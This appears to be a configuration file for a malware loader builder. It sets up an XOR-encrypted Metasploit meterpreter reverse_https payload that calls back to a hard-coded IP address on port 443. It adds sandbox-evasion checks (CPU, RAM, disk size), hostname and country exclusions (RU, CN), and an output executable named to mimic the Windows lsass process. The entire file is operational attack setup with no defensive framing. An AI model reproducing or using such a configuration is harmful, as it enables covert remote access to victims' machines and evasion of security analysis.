[Payload]
# metasploit payloads, use "msfvenom -l payloads" to list all payloads
name=windows/x64/meterpreter/reverse_https
# name=windows/x64/messagebox
# name=windows/x64/meterpreter_reverse_tcp

# lhost and lport are used for reverse_tcp and reverse_http(s)
# lhost=37.114.41.46
lhost=37.114.41.46
lport=443
# luri is used for reverse_http(s)
luri=/furdzz

# xor, dictionary (not yet aes)
# encryption_method=xor
encryption_method=xor

# XOR key, if encryption_method=xor
# random -> between 0x1111 and 0xffff with certain entropy
# encryption_key=random
# encryption_key=0x4444
encryption_key=random

[Anti-Analysis]
# If cpu cores is less or equal than <value>, the payload will not be executed
# If not set, check will no be made
cpu_cores=1

# If ram size is less than <value>, the payload will not be executed
# If not set, check will no be made
# Size in MB
ram_size=4000
# If disk size is less than <value>, the payload will not be executed
# If not set, check will no be made
# Size in GB
disk_size=120

# target_hostname has priority over avoid_hostname
# target_hostname=prefix1
target_hostname=

# correct format is
# avoid_hostname=prefix1
# avoid_hostname=prefix1,prefix2,prefix3
avoid_hostname=M

# based on : keyboard layout, language, timezone (IP todo)
# if one match, the payload will not be executed
# avoid_countries=RU
avoid_countries=RU,CN

[Stub]
# default, a bit useless
filename=loader.c

# output file name
output_file=lssas_bypass2.exe
